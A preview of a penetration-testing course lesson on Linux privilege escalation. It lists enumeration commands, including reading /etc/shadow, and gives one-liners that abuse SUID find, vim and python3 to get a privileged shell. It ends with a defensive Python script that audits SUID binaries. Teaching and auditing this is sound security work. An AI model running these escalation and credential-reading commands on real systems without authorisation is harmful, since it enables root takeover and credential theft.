You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
After gaining initial access to a system (often as a low-privilege user), privilege escalation is the process of elevating your permissions — typically to root on Linux or SYSTEM/Administrator on Windows. This is a critical pentest phase because it demonstrates the full impact of an initial compromise.
Authorisation: Privilege escalation should only be attempted on systems within your agreed scope. Document every step.
Before attempting any escalation, gather information:
```bash
# Current user and groups
whoami
id
groups

# System information
uname -a
cat /etc/os-release
hostname

# Other users
cat /etc/passwd
cat /etc/shadow   # if readable — immediate win

# Running processes
ps aux

# Network connections
ss -tulnp
netstat -antp

# Installed packages (look for outdated software)
dpkg -l   # Debian/Ubuntu
rpm -qa   # RHEL/CentOS
```
SUID (Set User ID) binaries execute with the owner's privileges — often root:
```bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Common exploitable SUID binaries:
# (bash -p is "privileged" mode: it keeps the elevated effective UID instead of dropping it)

# /usr/bin/find
find . -exec /bin/bash -p \;

# /usr/bin/vim
vim -c ':!bash'

# /usr/bin/python3
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
```
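As an added defender-side example (not part of the lesson), the following Python script turns the SUID step above into an audit: it enumerates SUID files the same way `find / -perm -4000 -type f` does, reports any not present in a known-good baseline, flags the shell-capable binaries the lesson names (find, vim, python3), and prints the `chmod u-s` remediation for each. The baseline and the sample path list are constructed assumptions, not data from a real host.

```python
"""Audit SUID binaries: report unexpected ones and those that can spawn a shell."""
import os
import stat

# Binaries the lesson names as trivially abusable when SUID: each can execute a shell.
SHELL_CAPABLE = {"find", "vim", "python3"}

# Constructed example baseline (assumption): SUID files expected on a typical
# Debian-style host. Generate the real one from a known-good image.
EXAMPLE_BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/newgrp",
    "/usr/bin/chsh", "/usr/bin/mount", "/usr/bin/umount",
}

# Constructed sample enumeration output (assumption), not from a real host.
SAMPLE_SUID = ["/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su",
               "/usr/bin/find", "/usr/bin/python3"]


def list_suid(root="/"):
    """Regular files under root with the SUID bit set (like `find / -perm -4000 -type f`)."""
    found = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable entries are skipped, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def audit_suid(suid_paths, baseline):
    """Classify SUID paths: 'unexpected' = not in baseline; 'shell_capable' =
    basename is a tool that can drop to a shell (highest-priority finding)."""
    unexpected = sorted(p for p in suid_paths if p not in baseline)
    shell_capable = sorted(p for p in suid_paths
                           if os.path.basename(p) in SHELL_CAPABLE)
    return {"unexpected": unexpected, "shell_capable": shell_capable}


def remediation(report):
    """Commands that strip the SUID bit from every flagged path."""
    flagged = sorted(set(report["unexpected"]) | set(report["shell_capable"]))
    return [f"chmod u-s {p}" for p in flagged]


if __name__ == "__main__":
    rep = audit_suid(SAMPLE_SUID, EXAMPLE_BASELINE)  # swap in list_suid() on a host
    print(rep, "\n".join(remediation(rep)), sep="\n")
```

Run it periodically and diff the `unexpected` list against the previous run; a newly SUID interpreter or editor is a high-signal indicator of a misconfiguration or a persistence attempt.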